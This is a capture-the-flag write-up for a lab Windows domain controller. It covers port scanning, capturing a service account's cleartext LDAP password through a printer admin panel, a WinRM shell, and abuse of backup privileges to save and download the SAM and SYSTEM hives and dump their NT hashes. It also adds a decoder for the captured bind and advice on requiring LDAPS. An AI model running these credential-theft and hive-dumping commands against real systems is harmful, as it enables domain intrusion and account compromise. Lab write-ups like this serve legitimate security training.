Return
Nmap Enumeration
# Nmap 7.95 scan initiated Mon Jun 2 08:08:48 2025 as: /usr/lib/nmap/nmap -sC -sV -vv -oN nmap 10.10.11.108
Nmap scan report for 10.10.11.108
Host is up, received echo-reply ttl 127 (0.083s latency).
Scanned at 2025-06-02 08:08:48 CDT for 25s
Not shown: 987 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: HTB Printer Admin Panel
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-06-02 05:06:27Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 31931/tcp): CLEAN (Couldn't connect)
| Check 2 (port 37579/tcp): CLEAN (Couldn't connect)
| Check 3 (port 26260/udp): CLEAN (Timeout)
| Check 4 (port 19461/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: -8h02m27s
| smb2-time:
| date: 2025-06-02T05:06:38
|_ start_date: N/A
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 2 08:09:13 2025 -- 1 IP address (1 host up) scanned in 24.98 seconds
SMB Enumeration
┌──(wzwr㉿kali)-[~/Documents/htb/return]
└─$ crackmapexec smb 10.10.11.108 -u '' -p '' --shares
SMB 10.10.11.108 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB 10.10.11.108 445 PRINTER [+] return.local\:
SMB 10.10.11.108 445 PRINTER [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(wzwr㉿kali)-[~/Documents/htb/return]
└─$ crackmapexec smb 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!' --shares
SMB 10.10.11.108 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB 10.10.11.108 445 PRINTER [+] return.local\svc-printer:1edFg43012!!
SMB 10.10.11.108 445 PRINTER [+] Enumerated shares
SMB 10.10.11.108 445 PRINTER Share Permissions Remark
SMB 10.10.11.108 445 PRINTER ----- ----------- ------
SMB 10.10.11.108 445 PRINTER ADMIN$ READ Remote Admin
SMB 10.10.11.108 445 PRINTER C$ READ,WRITE Default share
SMB 10.10.11.108 445 PRINTER IPC$ READ Remote IPC
SMB 10.10.11.108 445 PRINTER NETLOGON READ Logon server share
SMB 10.10.11.108 445 PRINTER SYSVOL READ Logon server share
HTTP Enumeration
Did we find a password? Nope…
We can check the request the admin panel sends.
It appears to send a request to the IP address specified in the parameter, so I pointed it at my own machine to see what happens.
┌──(wzwr㉿kali)-[~/Documents/htb/return]
└─$ nc -lvnp 389
listening on [any] 389 ...
connect to [10.10.16.24] from (UNKNOWN) [10.10.11.108] 63695
0*`%return\svc-printer
1edFg43012!!
We captured the credentials!
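Why a plain nc listener on port 389 was enough: the panel performed an LDAP simple bind against the address we supplied, and a simple bind carries the bind DN and the password as raw BER octet strings with no encryption, which is why the terminal shows `0*`%` (the SEQUENCE and BindRequest headers) followed by the account name and password. The decoder below is an added example, not part of the original writeup; it parses such a capture the way a network monitor that flags cleartext binds would. The byte string is reconstructed from the visible output, and the messageID value (1) is an assumption.

```python
# Constructed reproduction of what the listener on 389 received: an LDAP simple
# BindRequest. Only the printable bytes showed in the terminal; messageID = 1 is assumed.
CAPTURE = (
    b"\x30\x2a"             # SEQUENCE (LDAPMessage), 42 bytes      -> prints as "0*"
    b"\x02\x01\x01"         # INTEGER messageID = 1 (assumed)
    b"\x60\x25"             # [APPLICATION 0] BindRequest, 37 bytes -> prints as "`%"
    b"\x02\x01\x03"         # INTEGER version = 3
    b"\x04\x12"             # OCTET STRING name, 18 bytes
    b"return\\svc-printer"
    b"\x80\x0c"             # [0] simple authentication: the password itself, 12 bytes
    b"1edFg43012!!"
)

def _tlv(buf: bytes, pos: int):
    """Read one BER tag-length-value at pos; returns (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def decode_bind_request(packet: bytes) -> dict:
    """Decode an LDAPMessage carrying a BindRequest and report whether it is cleartext."""
    tag, message, _ = _tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    _, msgid, pos = _tlv(message, 0)
    op, body, _ = _tlv(message, pos)
    if op != 0x60:
        raise ValueError(f"protocolOp tag 0x{op:02x} is not a BindRequest")
    _, version, pos = _tlv(body, 0)
    _, name, pos = _tlv(body, pos)
    auth_tag, cred, _ = _tlv(body, pos)
    simple = auth_tag == 0x80               # 0xA3 would be a SASL bind instead
    return {
        "message_id": int.from_bytes(msgid, "big"),
        "version": int.from_bytes(version, "big"),
        "name": name.decode("utf-8", "replace"),
        "cleartext": simple,                # simple bind: password readable by any listener
        "password": cred.decode("utf-8", "replace") if simple else None,
    }
```

The fix on the defensive side is the usual one: point such devices only at LDAPS (636) or require signing/StartTLS, and treat any simple bind seen on 389 from an appliance as a credential leak.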
WinRM Enumeration
┌──(wzwr㉿kali)-[~/Documents/htb/return]
└─$ crackmapexec winrm 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'
SMB 10.10.11.108 5985 PRINTER [*] Windows 10 / Server 2019 Build 17763 (name:PRINTER) (domain:return.local)
HTTP 10.10.11.108 5985 PRINTER [*] http://10.10.11.108:5985/wsman
WINRM 10.10.11.108 5985 PRINTER [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)
┌──(wzwr㉿kali)-[~/Documents/htb/return]
└─$ evil-winrm -i 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami
return\svc-printer
*Evil-WinRM* PS C:\Users\svc-printer\Documents>
Post-Exploitation
Quick Check
*Evil-WinRM* PS C:\Users\svc-printer> net user /domain
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest krbtgt
svc-printer
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\svc-printer> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
Hmm… we have a lot of privileges! The most interesting one is SeBackupPrivilege. Let’s abuse this token.
Abuse Backup Privileges
*Evil-WinRM* PS C:\Users\svc-printer> reg save hklm\sam C:\Users\svc-printer\sam.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\svc-printer> reg save hklm\system C:\Users\svc-printer\system.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\svc-printer> download sam.hive
Info: Downloading C:\Users\svc-printer\sam.hive to sam.hive
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc-printer> download system.hive
Info: Downloading C:\Users\svc-printer\system.hive to system.hive
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc-printer>
┌──(wzwr㉿kali)-[~/Documents/htb/return]
└─$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:34386a771aaca697f447754e4863d38a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...